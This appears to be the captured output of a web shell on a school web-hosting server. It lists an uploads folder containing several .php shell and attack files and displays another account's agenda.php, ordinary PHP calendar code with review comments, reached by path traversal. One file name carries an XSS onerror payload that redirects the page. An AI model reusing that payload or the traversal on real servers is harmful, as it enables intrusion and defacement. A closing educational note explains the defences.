🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../583521.klas4s23.mid-ica.nl/public_html/gouden_voetbalschoen/agenda.php

<?php
// Bootstrap for the agenda page: load configuration and the project's class file,
// then start the session before any session data is read further down.
// NOTE(review): both paths are relative, so config.php presumably sits inside the
// web root next to this page. $pdo is used below without being defined in this
// file, so it presumably comes from config.php. If that file holds the database
// credentials, keep it outside public_html and unreadable by other accounts on
// the host. Confirm.
require_once 'config.php';
include_once 'class/class.php';
// NOTE(review): session cookie flags (HttpOnly, Secure, SameSite) are not set here;
// confirm they are configured in config.php or php.ini.
session_start();

// Task management functions
// NOTE(review): runs on every request before any input is inspected here; presumably
// it handles a task sign-up submission. Verify that it checks the logged-in user and
// a CSRF token itself.
functions::taakAanmelden();

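// Read the month, year and view (week/month) from the URL, apply the navigation
// action, and derive the date range used by the task query below.

/**
 * Turn the untrusted query-string parameters into a validated calendar period.
 *
 * Fixes compared with the earlier inline logic:
 *  - month/year outside 1-12 / 1000-9999 fall back to the defaults instead of
 *    producing an unparseable date (strtotime() === false, i.e. 1970);
 *  - array-valued parameters ("?week_start[]=x") are ignored instead of reaching strtotime();
 *  - $view is reduced to the two supported values, so no free-form request text
 *    is carried further into the page;
 *  - year_up / year_down are applied once (the month view used to apply them twice);
 *  - in the month view the date range is computed after navigation, so the
 *    queried range matches the month that is displayed.
 *
 * @param array $query         Request parameters (normally $_GET).
 * @param int   $default_month Month used when none/invalid is supplied (1-12).
 * @param int   $default_year  Year used when none/invalid is supplied.
 * @return array{month:int, year:int, view:string, first_day:string, start:int, end:int}
 *               'start' and 'end' are Unix timestamps.
 */
function resolveAgendaPeriod(array $query, int $default_month, int $default_year): array
{
    // Four-digit years keep "$year-$month-01" an unambiguous date for strtotime().
    $min_year = 1000;
    $max_year = 9999;

    // Only scalar request values are accepted; everything else counts as absent.
    $read = function (string $key) use ($query) {
        return (isset($query[$key]) && is_scalar($query[$key])) ? (string) $query[$key] : null;
    };
    // Unix timestamp, or false when the parameter is absent or strtotime() rejects it.
    $read_date = function (string $key) use ($read) {
        $raw = $read($key);
        return $raw === null ? false : strtotime($raw);
    };

    $month = $read('month');
    $month = $month === null ? $default_month : (int) $month;
    if ($month < 1 || $month > 12) {
        $month = $default_month;
    }

    $year = $read('year');
    $year = $year === null ? $default_year : (int) $year;
    if ($year < $min_year || $year > $max_year) {
        $year = $default_year;
    }

    // Allowlist: anything other than 'week' is treated as the default month view.
    $view = $read('view') === 'week' ? 'week' : 'month';
    $action = $read('action');

    $range_start = false;
    $range_end = false;

    if ($view === 'week') {
        // Week runs Sunday to Saturday; explicit week_start/week_end win when parseable.
        // NOTE(review): the width of a caller-supplied range is not bounded here.
        $range_start = $read_date('week_start');
        if ($range_start === false) {
            $range_start = strtotime('last sunday', strtotime("$year-$month-01"));
        }
        $range_end = $read_date('week_end');
        if ($range_end === false) {
            $range_end = strtotime('next saturday', $range_start);
        }

        if ($action === 'week_up') {
            // Next week
            $range_start = strtotime('+1 week', $range_start);
            $range_end = strtotime('+1 week', $range_end);
        } elseif ($action === 'week_down') {
            // Previous week
            $range_start = strtotime('-1 week', $range_start);
            $range_end = strtotime('-1 week', $range_end);
        }
    } elseif ($action === 'month_up') {
        $month++;
        if ($month > 12) {
            $month = 1;
            $year++;
        }
    } elseif ($action === 'month_down') {
        $month--;
        if ($month < 1) {
            $month = 12;
            $year--;
        }
    }

    // Year navigation applies in both views, exactly once.
    if ($action === 'year_up') {
        $year++;
    } elseif ($action === 'year_down') {
        $year--;
    }
    // Navigation must not push the year outside the parseable range.
    $year = max($min_year, min($max_year, $year));

    $first_day = "$year-$month-01";
    if ($view === 'month') {
        // Month view: first to last day of the (post-navigation) month.
        $range_start = strtotime($first_day);
        $range_end = strtotime('last day of this month', $range_start);
    }

    return [
        'month' => $month,
        'year' => $year,
        'view' => $view,
        'first_day' => $first_day,
        'start' => $range_start,
        'end' => $range_end,
    ];
}

$agenda_period = resolveAgendaPeriod($_GET, (int) date('m'), (int) date('Y'));
$current_month = $agenda_period['month'];
$current_year = $agenda_period['year'];
$view = $agenda_period['view'];
$first_day_of_month = $agenda_period['first_day'];
$week_start_date = $agenda_period['start'];
$week_end_date = $agenda_period['end'];

// Date range (inclusive) for the task query
$start_date = date('Y-m-d', $week_start_date); // Start of the week/month
$end_date = date('Y-m-d', $week_end_date); // End of the week/month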

// Load every task whose date lies inside the selected range, together with the
// number of registrations for that task. The range values are passed as bound
// parameters, never concatenated into the SQL text.
$stmt = $pdo->prepare("
    SELECT tasks.*, 
           (SELECT COUNT(*) FROM task_registrations WHERE task_id = tasks.id) AS registrations_count
    FROM tasks
    WHERE date BETWEEN :start_date AND :end_date
");
$stmt->execute([
    ':start_date' => $start_date, // first day of the range (Y-m-d)
    ':end_date' => $end_date, // last day of the range (Y-m-d)
]);
$tasks = $stmt->fetchAll(PDO::FETCH_ASSOC);

// Collect the ids of the tasks the logged-in user has registered for.
// The list stays empty when no user id is present in the session.
$registered_task_ids = [];
if (isset($_SESSION['user_id'])) {
    // The id comes from the server-side session, not from the request.
    $user_id = $_SESSION['user_id'];
    $registration_stmt = $pdo->prepare("SELECT task_id FROM task_registrations WHERE user_id = :user_id");
    // Bound by reference as an integer parameter; the SQL text itself contains no user data.
    $registration_stmt->bindParam(':user_id', $user_id, PDO::PARAM_INT);
    $registration_stmt->execute();
    // FETCH_COLUMN returns a flat list of the first column (task_id) of each row.
    $registered_task_ids = $registration_stmt->fetchAll(PDO::FETCH_COLUMN);
}

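/**
 * Return the tasks whose date falls on the given day of the month.
 *
 * Only the day-of-month is compared (month and year are ignored), so the caller
 * is expected to pass tasks already limited to the period being displayed.
 *
 * @param int|string $day   Day of the month (1-31); numeric strings are accepted.
 * @param iterable   $tasks Task rows, each an array with a 'date' entry that strtotime() can parse.
 * @return array Matching task rows in input order, indexed from 0.
 */
function getTasksForDay($day, $tasks)
{
    $wanted_day = (int) $day;
    $tasks_for_day = [];
    foreach ($tasks as $task) {
        $timestamp = (isset($task['date']) && is_scalar($task['date']))
            ? strtotime((string) $task['date'])
            : false;
        if ($timestamp === false) {
            // A missing or unparseable date used to be treated as timestamp 0 and
            // matched a day in 1970; such rows are skipped instead.
            continue;
        }
        // Integer comparison instead of loose string/number juggling.
        if ((int) date('j', $timestamp) === $wanted_day) {
            $tasks_for_day[] = $task;
        }
    }
    return $tasks_for_day;
}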
?>

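⚠️ Educational Warning: This page is the output of a web shell, a script that was uploaded to the server and is executed by it; the listing above shows .php files stored in an upload directory. In a real attack, this could allow complete server compromise! The usual defences are to reject executable file types on upload, to serve uploads from a location where the web server does not execute scripts, and to isolate hosting accounts so one site cannot read another's files.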